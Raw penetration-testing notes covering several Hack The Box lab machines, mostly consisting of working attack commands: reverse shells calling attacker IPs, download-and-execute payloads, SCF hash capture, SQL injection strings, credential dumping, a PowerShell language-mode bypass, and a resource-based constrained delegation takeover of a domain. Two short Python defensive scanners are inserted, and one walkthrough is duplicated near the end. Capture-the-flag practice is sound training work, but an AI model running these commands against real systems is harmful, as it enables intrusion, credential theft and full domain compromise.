Settings>>external_scripts>>scripts: set up a payload based on the 'info' example; scheduler>>schedules: set up a schedule (Changes>>Save_configuration)
OR do it in the cli
nadine@SERVMON c:\temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.19 443 -e cmd.exe"
nadine@SERVMON c:\temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=1m
OR trigger it by restarting the service
PS> Get-Service nscp | fl *
found 'CanStop : True'
`sc.exe stop nscp` `sc.exe start nscp`
Initial_Foothold
nmap found '1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)'
ODAT (Oracle Database Attacking Tool) https://github.com/quentinhardy/odat
`./odat-libc2.17-x86_64 --help`
`./odat-libc2.17-x86_64 all -s 10.10.10.82 -p 1521` and answer C ('continue without asking'); found cred scott/tiger
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.19 lport=9001 -f exe -o ../9001.exe`
`./odat-libc2.17-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 9001.exe ../9001.exe`
`./odat-libc2.17-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 9001.exe`
the listener got a system shell
OR more detailed steps by 0xdf: https://0xdf.gitlab.io/2018/08/04/htb-silo.html#oracle-db---port-1521
Initial_Foothold
`smbmap -H 10.10.10.103 -u anonymous -R`
any file we upload to /Users/Public gets deleted after a short time, so something is processing that folder
upload a .scf (Windows Explorer Shell Command) file so that when a user opens the share we capture their hash
=====0xdf.scf=====
[Shell]
Command=2
IconFile=\\10.10.14.4\icon
=====ippsec.scf=====
[Shell]
Command=2
IconFile=\\10.10.14.3\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
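As an added defensive check that is not part of the original notes: a small Python scanner that parses the two .scf bodies above (embedded here as constructed sample files) and flags IconFile entries pointing at hosts outside an allow-list, which is how a share owner would spot a planted file of this kind. The file names, the allow-list and the benign third file are constructed for the example.

```python
import re

# Constructed sample share listing: the two .scf files shown above plus a benign file.
SAMPLE_FILES = {
    "0xdf.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.4\\icon\n",
    "ippsec.scf": (
        "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.3\\share\\pwn.ico\n"
        "[Taskbar]\nCommand=ToggleDesktop\n"
    ),
    "readme.txt": "nothing to see here\n",
}

# IconFile=\\host\path ... ; capture the host portion of the UNC path.
UNC_ICON_RE = re.compile(r"^\s*IconFile\s*=\s*\\\\([^\\\s]+)\\", re.IGNORECASE | re.MULTILINE)


def remote_icon_hosts(content):
    """Hosts referenced by IconFile=\\host\... lines in one SCF body (may be empty)."""
    return UNC_ICON_RE.findall(content)


def scan_share(files, trusted_hosts):
    """Return (filename, host) pairs for .scf files whose icon lives on an untrusted host.

    Explorer fetches the icon over SMB as soon as the folder is rendered, so a UNC
    path to an unknown host in a writable share is a strong signal of hash capture.
    """
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for name, body in files.items():
        if not name.lower().endswith(".scf"):
            continue
        for host in remote_icon_hosts(body):
            if host.lower() not in trusted:
                findings.append((name, host))
    return findings


if __name__ == "__main__":
    for name, host in scan_share(SAMPLE_FILES, {"fileserver.htb.local"}):
        print(f"suspicious: {name} loads its icon from {host}")
```

Blocking outbound SMB at the perimeter and denying anonymous write on the share remove the root cause; the scan only tells you it has already happened.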
`responder -I tun0` got a hash; cracking it gave cred amanda:Ashare1972
`mount -t cifs -o username=amanda,password=Ashare1972 "//10.10.10.103/CertEnroll" /mnt` found cert files, save for later
`ldapdomaindump -u 'htb.local\amanda' -p Ashare1972 10.10.10.103 -o ./ldap/` analyze users and groups
gobuster dir with /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt found //certenroll/ and //certsrv/
get the CSR(Certificate Signing Request)
I use `openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr` (Not sure where I got this)
ippsec uses `openssl genrsa -des3 -out amanda.key 2048` then `openssl req -new -key amanda.key -out amanda.csr`
login /certsrv/ with amanda:Ashare1972 then click request_a_certificate>>advanced_certificate_request, paste the amanda.csr content and submit, download base64 format
0xdf shows another way: install the cert, back it up (download), then use openssl to export the cert and key
login /certsrv/ with amanda:Ashare1972 then click request_a_certificate>>user_certificate>>install_this_certificate and backup/download this cert got amanda.p12 file
`openssl pkcs12 -in amanda.p12 -nocerts -out amanda.key` `openssl pkcs12 -in amanda.p12 -clcerts -nokeys -out amanda.crt`
Both ways end up with 2 files: .crt and .key
`wget https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb`
edit [endpoint: 'https://10.10.10.103:5986/wsman',] and change [user: 'username', password: 'password',] to [client_cert: 'amanda.crt', client_key: 'amanda.key', key_pass: '',]
`ruby winrm_shell_amanda.rb` I got an error and ran `gem install httpclient`
Privilege_escalation(break_out_ConstrainedLanguage_mode)
PS htb\amanda@SIZZLE Documents> $executioncontext.sessionstate.languagemode
ConstrainedLanguage
Bypass for PowerShell Constrained Language Mode https://github.com/padovah4ck/PSByPassCLM
compile in VS or just use the one in /PSByPassCLM/bin/x64/Debug and upload to target
PS htb\mrlky@SIZZLE temp> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.14.3 /rport=443 \windows\temp\PsBypassCLM.exe
and listen new shell `$executioncontext.sessionstate.languagemode` output: FullLanguage
Privilege_escalation(amanda->mrlky)
Rubeus is a C# toolset for raw Kerberos interaction and abuses https://github.com/GhostPack/Rubeus
upload as r.exe `.\r.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972`
OR
root@kali# /opt/chisel/chisel server -p 8008 --reverse
PS C:\windows\temp> .\c.exe client 10.10.14.4:8008 R:88:127.0.0.1:88 R:389:localhost:389
root@kali# GetUserSPNs.py -request -dc-ip 127.0.0.1 htb.local/amanda -save -outputfile GetUserSPNs.out
both get mrlky's hash; `hashcat GetUserSPNs.out --wordlist /usr/share/wordlists/rockyou.txt` cracks it to cred mrlky:Football#7
`openssl req -newkey rsa:2048 -nodes -keyout mrlky.key -out mrlky.csr`
do the same crt steps for mrlky with mrlky.csr and edit then launch `ruby winrm_shell_mrlky.rb`
do the same break_out_ConstrainedLanguage_mode for mrlky shell and enum
Privilege_escalation(mrlky->administrator)
`iex(new-object net.webclient).downloadstring('http://10.10.14.3/SharpHound.ps1')`
`. .\SharpHound.ps1`
`invoke-bloodhound -collectionmethod all -outputDirectory C:\users\mrlky\`
download and analyze in BloodHound: user 'mrlky' has 'DCSync' 'GetChangesAll' 'GetChanges' over 'HTB.LOCAL' domain
`secretsdump.py -just-dc mrlky:Football#7@10.10.10.103` found administrator NT hash
`wmiexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 administrator@10.10.10.103`
short_cuts 1(found hashes in file.txt)
found hashes in C:\windows\system32\file.txt
PS htb\amanda@SIZZLE system32> type file.txt
root@kali# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef -just-dc HTB.LOCAL/mrlky@10.10.10.103
short_cuts 2(found writable clean.bat)
original_content: forfiles -p "C:\Department Shares\Users\Public" -s -m *.* /C "cmd /c del @path"
PS htb\amanda@SIZZLE documents> icacls clean.bat
HTB\amanda:(I)(F)
PS htb\amanda@SIZZLE documents> echo "" | out-file -encoding ASCII -append clean.bat
PS htb\amanda@SIZZLE documents> echo '\windows\system32\spool\drivers\color\n.exe -e cmd.exe 10.10.14.4 443' | out-file -encoding ASCII -append test.bat
listener will get administrator shell
Initial_Foothold
https://watch.streamio.htb/Search.php manual SQL injection (WAF blocks '0x' and 'ORDER BY')
portswigger SQLI cheatsheet: https://portswigger.net/web-security/sql-injection/cheat-sheet#database-version
[';-- -] [df' union select 1,2,3,4,5,6;-- -] [df' union select 1,@@version,3,4,5,6;-- -] MSSQL 2019 15.0.2000.5 x64
MSSQL cheatsheet: https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Non-crackable: `responder -I tun0` [df'; use master; exec xp_dirtree '\\10.10.14.6\share';-- -] got a machine account hash
list all dbs: [df' union select 1,name,DB_NAME(),4,5,6 from master..sysdatabases;-- -] master,model,msdb,STREAMIO,streamio_backup,tempdb
list current db: [df' union select 1,(select DB_NAME()),3,4,5,6;-- -] output: STREAMIO
list STREAMIO tables: [ippsec' union select 1,(SELECT STRING_AGG(name,',') name FROM STREAMIO..sysobjects WHERE xtype = 'U'),3,4,5,6;-- -]
list STREAMIO.users columns: [ippsec' UNION SELECT 1,name,3,4,5,6 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users');-- -]
display contents: [ippsec' union select 1,CONCAT(username, ' ', password),3,4,5,6 FROM users-- -] save usernames and hashes and crack
Failed(none_works): `crackmapexec smb 10.10.11.158 -u user -p pass --no-bruteforce --continue-on-success`
`hydra -L users.txt -P passwords.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"` got cred yoshihide:66boysandgirls..
after logging in as yoshihide, we can access /admin and find that each button leads to a param, e.g. 'User management' leads to https://streamio.htb/admin/?user=
`wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: PHPSESSID=jtde06u71uq4t7pvs59b8iis1o" --hh 1678` found https://streamio.htb/admin/?debug=
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php and `base64 -d` we found: "Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890'
feroxbuster found /admin/master.php which has hint: "Only accessable through includes"
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php and `base64 -d` we found: eval(file_get_contents($_POST['include']))
In burp, we can use the POST param 'include' to get code execution, e.g. "include=http://10.10.14.19/payload.php"
0xdf payload.php: system("powershell -c wget 10.10.14.6/nc64.exe -outfile \\programdata\\nc64.exe"); system("\\programdata\\nc64.exe -e powershell 10.10.14.6 443");
ippsec payload.php: system("curl 10.10.14.23/nc64.exe -o c:\\windows\\temp\\nc64.exe"); system("c:\\windows\\temp\\nc64.exe 10.10.14.23 4444 -e cmd.exe");
I use 0xdf payload with: `curl --silent -X POST -k "https://streamio.htb/admin/?debug=master.php" --data-urlencode "include=http://10.10.14.19/payload.php" --cookie "PHPSESSID=hqgmr9p1o14he1fl6vubv8ouq7"`
listener got yoshihide shell
Privilege_escalation(yoshihide->nikk37)
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
besides the index.php we exfiltrated, login.php and register.php also contain db_admin:B1@hx31234567890
PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;" only 2 tables: movies, users
PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
save usernames and hashes, crack `crackmapexec smb 10.10.11.158 -u user -p pass --continue-on-success --no-bruteforce` got cred nikk37:get_dem_girls2@yahoo.com
winrm also works `crackmapexec winrm 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'`
`evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i 10.10.11.158`
Privilege_escalation(nikk37->JDgodd)
winpeas.exe found firefox cred file at C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release\
https://github.com/lclevy/firepwd transfer key4.db and logins.json from target to a folder on kali
`python3 ./firepwd-master/firepwd.py -d ./firefoxprofile` save usernames and passwords
`crackmapexec smb 10.10.11.158 -u ./firefoxprofile/users.txt -p ./firefoxprofile/passwords.txt --continue-on-success` get cred JDgodd:JDg0dd1s@d0p3cr3@t0r
winrm doesn't work, but we can enum further as 'JDgodd'
Privilege_escalation(JDgodd->administrator)
Failed(can't connect dc.streamio.htb): `bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb --zip`
after adding 'dc.streamio.htb' to /etc/hosts and syncing time with `ntpdate -s 10.10.11.158`:
`bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb --zip`
in bloodhound, user 'jdgodd' has 'WriteOwner' over 'CORE STAFF' group which has 'ReadLAPSPassword' over 'DC.STREAMIO.HTB' computer
*Evil-WinRM* PS C:\programdata> upload PowerView.ps1
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
Add user 'JDgodd' to 'CORE STAFF' group
0xdf: $pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
0xdf: $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
0xdf: Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
0xdf: Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
0xdf: net user jdgodd
ippsec: $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
ippsec: $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
ippsec: Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $Cred
ippsec: Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
ippsec: Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
ippsec: net group 'CORE STAFF'
method_1 'ReadLAPSPassword' by property on the computer object
*Evil-WinRM* PS C:\programdata> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred
ms-Mcs-AdmPwd : -Z4I/T1W0%+4nF
method_2 'ReadLAPSPassword' by ldapsearch
`ldapsearch -h 10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd`
ms-Mcs-AdmPwd: -Z4I/T1W0%+4nF
method_3 'ReadLAPSPassword' by crackmapexec
`crackmapexec smb 10.10.11.158 -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds`
SMB 10.10.11.158 445 DC [-] DC\administrator:-Z4I/T1W0%+4nF STATUS_LOGON_FAILURE
`evil-winrm -u administrator -p '-Z4I/T1W0%+4nF' -i 10.10.11.158`
Initial_Foothold
`smbmap -H 10.10.11.174 -u anonymous -R` found .\support-tools\UserInfo.exe.zip
Failed(no perm): `smbget -U anonymous smb://10.10.11.174/support-tools/UserInfo.exe.zip`
`smbclient //10.10.11.174/support-tools` smb: \> get UserInfo.exe.zip
`mkdir UserInfo; unzip UserInfo.exe.zip -d UserInfo`
Failed (neither works): `pwsh` OR `wine UserInfo.exe -v find -first '*'`
transfer to commando (Windows VM), add 'support.htb' to C:\Windows\System32\drivers\etc\hosts
PS > .\UserInfo.exe find -first '*'
wireshark captures cred ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Nothing_interesting: `bloodhound-python -c ALL --zip -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174`
`ldapsearch -x -H ldap://10.10.11.174 -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > ldapsearch_ldap.txt`
found suspected password 'Ironside47pleasure40Watchful' under the 'support' user object
`crackmapexec winrm support.htb -u support -p 'Ironside47pleasure40Watchful'` test good
`evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'`
Privilege_escalation(support->domain_admin)
user 'support' is in 'Shared Support Accounts' group, which has 'GenericAll' over 'DC.SUPPORT.HTB' computer object
based on bloodhound GenericAll abuse_info: Full control of a computer object can be used to perform 'resource-based constrained delegation' attack
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
https://github.com/Kevin-Robertson/Powermad
https://github.com/GhostPack/Rubeus
just upload the pre-compiled rubeus.exe to the target
*****[Resource Based Constrained Delegation] ippsec:
we can add a computer ($FAKE-COMP01) under our control to the domain and configure the Domain Controller to allow $FAKE-COMP01 to act on behalf of it.
Then, by acting on behalf of the DC we can request Kerberos tickets for $FAKE-COMP01, with the ability to impersonate a highly privileged user on the Domain, such as the Administrator.
After the Kerberos tickets are generated, we can Pass the Ticket (PtT) and authenticate as this privileged user, giving us control over the entire domain.
`Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota` check if value greater than 0
`upload PowerView.ps1` `. ./PowerView.ps1`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is empty
`upload Powermad.ps1` `. ./Powermad.ps1`
=====Creating a Computer Object=====
`New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)`
`Get-ADComputer -identity FAKE-COMP01` check if it's created and SID assigned
=====Configuring RBCD(Resource-Based Constrained Delegation)=====
method_1 We can either set the PrincipalsAllowedToDelegateToAccount value to FAKE-COMP01 through the builtin PowerShell Active Directory module, which will in turn configure the msds-allowedtoactonbehalfofotheridentity attribute on its own.
method_2 we can use the PowerView module to directly set the msds-allowedtoactonbehalfofotheridentity attribute.
ippsec only shows method_1
`Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$`
`Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is not empty
this attribute is a raw security descriptor; we have to decode the bytes to verify the SID of FAKE-COMP01$
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check the SecurityIdentifier with FAKE-COMP01$ and AceType: AccessAllowed
=====Performing a S4U Attack=====
'Service for User' attack, also known as 'Kerberos unconstrained delegation abuse'
`.\rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb` copy the value of 'rc4_hmac' then generate ticket for administrator
`.\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt`
save the 'Administrator' user's base64 ticket string as ticket.kirbi.b64 on kali
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass`
*****[Resource Based Constrained Delegation] 0xdf:
First I’ll add a fake computer to the domain under my control.
Then I can act as the DC to request Kerberos tickets for the fake computer giving the ability to impersonate other accounts (Administrator).
For this to work, I’ll need an authenticated user who can add machines to the domain (by default, any user can add up to 10).
This is configured in the ms-ds-machineaccountquota attribute, which needs to be larger than 0.
Finally, I need write privileges over a domain joined computer (which GenericALL on the DC gets me.)
upload the 3 tools, and load 2, `. ./PowerView.ps1` `. ./Powermad.ps1`
`Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota` check if value greater than 0
`Get-DomainController | select name,osversion | fl` check that OSVersion is 2012 or later (here 2022)
`Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl` check if value is empty
=====Create FakeComputer=====
`New-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString '0xdf0xdf123' -AsPlainText -Force)`
`$fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid`
`$fakesid` check it's assigned
=====configure the DC to trust my fake computer to make authorization decisions on its behalf=====
`$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"`
`$SDBytes = New-Object byte[] ($SD.BinaryLength)`
`$SD.GetBinaryForm($SDBytes, 0)`
`Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}`
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check the SecurityIdentifier matches 0xdfFakeComputer$ and AceType: AccessAllowed
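Both `$Descriptor.DiscretionaryAcl` checks above (the ippsec steps and the 0xdf steps) decode the msds-allowedtoactonbehalfofotheridentity bytes on the Windows side. Added example, not from either write-up: the same decode in Python so the attribute can be audited offline across every computer object, flagging any SID that is not an approved delegator. The fake computer SID and the approved list are constructed; the builder mirrors the SDDL the note uses so the parser has input to run on.

```python
"""Decode the self-relative security descriptor stored in a computer object's
msDS-AllowedToActOnBehalfOfOtherIdentity attribute and list the SIDs its DACL
trusts. Added auditing example, not from the write-ups above; the builder only
exists so the parser has realistic input to run on offline."""
import struct

# Two-letter SDDL rights used in the note's "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>)"
SDDL_RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
BUILTIN_ADMINS = "S-1-5-32-544"   # the "BA" owner in the SDDL string


def sddl_rights_to_mask(rights: str) -> int:
    """'CCDCLC...' -> access mask (0xF01FF for the full-control string above)."""
    return sum(SDDL_RIGHTS[rights[i:i + 2]] for i in range(0, len(rights), 2))


def sid_to_bytes(sid: str) -> bytes:
    """Serialize 'S-1-<authority>-<sub>...' into the binary SID layout."""
    parts = sid.split("-")
    if parts[:2] != ["S", "1"]:
        raise ValueError("unsupported SID: %s" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + int(parts[2]).to_bytes(6, "big")          # identifier authority, big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int) -> str:
    """Parse a binary SID at buf[off:] back into its string form."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def build_self_relative_sd(owner_sid: str, allowed) -> bytes:
    """Build the descriptor the note writes in SDDL: owner plus one
    ACCESS_ALLOWED ACE per (rights, sid) pair. Layout follows MS-DTYP:
    20-byte header, then owner SID, then the ACL with its ACEs."""
    aces = b""
    for rights, sid in allowed:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b),
                            sddl_rights_to_mask(rights)) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed), 0) + aces
    owner_b = sid_to_bytes(owner_sid)
    owner_off, dacl_off = 20, 20 + len(owner_b)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner_b + acl


def parse_dacl(sd: bytes) -> list:
    """Return [(ace_type, access_mask, sid)] for every ACE in the DACL.
    This is what $Descriptor.DiscretionaryAcl shows on the Windows side."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, aces = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        aces.append((ace_type, mask, bytes_to_sid(sd, off + 8)))
        off += ace_size                                  # ACE size covers header + SID
    return aces


def unexpected_delegators(sd: bytes, approved_sids) -> list:
    """SIDs granted ACCESS_ALLOWED on the attribute that are not on the approved
    list: on a DC that list should normally be empty, so anything here is a lead."""
    approved = set(approved_sids)
    return [sid for ace_type, _, sid in parse_dacl(sd)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE and sid not in approved]


# Constructed SID standing in for $fakesid; a real one comes from
# (Get-DomainComputer <name>).objectsid on the domain in question.
FAKE_COMPUTER_SID = "S-1-5-21-1677581083-3380853377-188903654-5101"

if __name__ == "__main__":
    blob = build_self_relative_sd(BUILTIN_ADMINS,
                                  [("CCDCLCSWRPWPDTLOCRSDRCWDWO", FAKE_COMPUTER_SID)])
    for ace_type, mask, sid in parse_dacl(blob):
        print("type=%d mask=0x%X sid=%s" % (ace_type, mask, sid))
    print("unexpected:", unexpected_delegators(blob, []))
```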
If we rerun bloodhound, the '0xdfFakeComputer.support.htb' computer_object now has 'AllowedToAct' over the 'dc.support.htb' computer_object
=====Auth as Fake Computer=====
`.\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb` copy 'rc4_hmac' value
=====get ticket=====
`.\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt`
`.\Rubeus.exe klist`
=====use ticket on kali=====
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass`
`smbmap -H 10.10.11.174 -u anonymous -R` found .\support-tools\UserInfo.exe.zip
Failed(no perm): `smbget -U anonymous smb://10.10.11.174/support-tools/UserInfo.exe.zip`
`smbclient //10.10.11.174/support-tools` smb: \> get UserInfo.exe.zip
`mkdir UserInfo; unzip UserInfo.exe.zip -d UserInfo`
Failed(both not work) `pwsh` OR `wine UserInfo.exe -v find -first '*'`
transfer to commando(windows VM) edit C:\Windows\System32\drivers\etc\hosts 'support.htb'
PS > .\UserInfo.exe find -first '*'
wireshark capture cred ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Nothing_interesting: `bloodhound-python -c ALL --zip -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174`
`ldapsearch -x -H ldap://10.10.11.174 -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > ldapsearch_ldap.txt`
found suspectpass 'Ironside47pleasure40Watchful' under 'support' user object
`crackmapexec winrm support.htb -u support -p 'Ironside47pleasure40Watchful'` test good
`evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'`
Privilege_escalation(support->domain_admin)
user 'support' is in 'Shared Support Accounts' group, which has 'GenericAll' over 'DC.SUPPORT.HTB' computer object
based on bloodhound GenericAll abuse_info: Full control of a computer object can be used to perform 'resource-based constrained delegation' attack
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
https://github.com/Kevin-Robertson/Powermad
https://github.com/GhostPack/Rubeus
just use the pre-compiled rubeus.exe upload to target
*****[Resource Based Constrained Delegation] ippsec:
we can add a computer($FAKE-COMP01) under our control to the domain and configure the Domain Controller to allow $FAKE-COMP01 to act on behalf of it.
Then, by acting on behalf of the DC we can request Kerberos tickets for $FAKE-COMP01 , with the ability to impersonate a highly privileged user on the Domain, such as the Administrator .
After the Kerberos tickets are generated, we can Pass the Ticket (PtT) and authenticate as this privileged user, giving us control over the entire domain.
`Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota` check if value greater than 0
`upload PowerView.ps1` `. ./PowerView.ps1`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is empty
`upload Powermad.ps1` `. ./Powermad.ps1`
=====Creating a Computer Object=====
`New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)`
`Get-ADComputer -identity FAKE-COMP01` check if it's created and SID assigned
=====Configuring RBCD(Resource-Based Constrained Delegation)=====
method_1 We can either set the PrincipalsAllowedToDelegateToAccount value to FAKE-COMP01 through the builtin PowerShell Active Directory module, which will in turn configure the msds-allowedtoactonbehalfofotheridentity attribute on its own.
method_2 we can use the PowerView module to directly set the msds-allowedtoactonbehalfofotheridentity attribute.
ippsec only shows method_1
`Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$`
`Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is not empty
this attribute is a 'Raw Security Descriptor', so we have to convert the bytes to a string to verify that the SID in the ACE is FAKE-COMP01$
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check the SecurityIdentifier with FAKE-COMP01$ and AceType: AccessAllowed
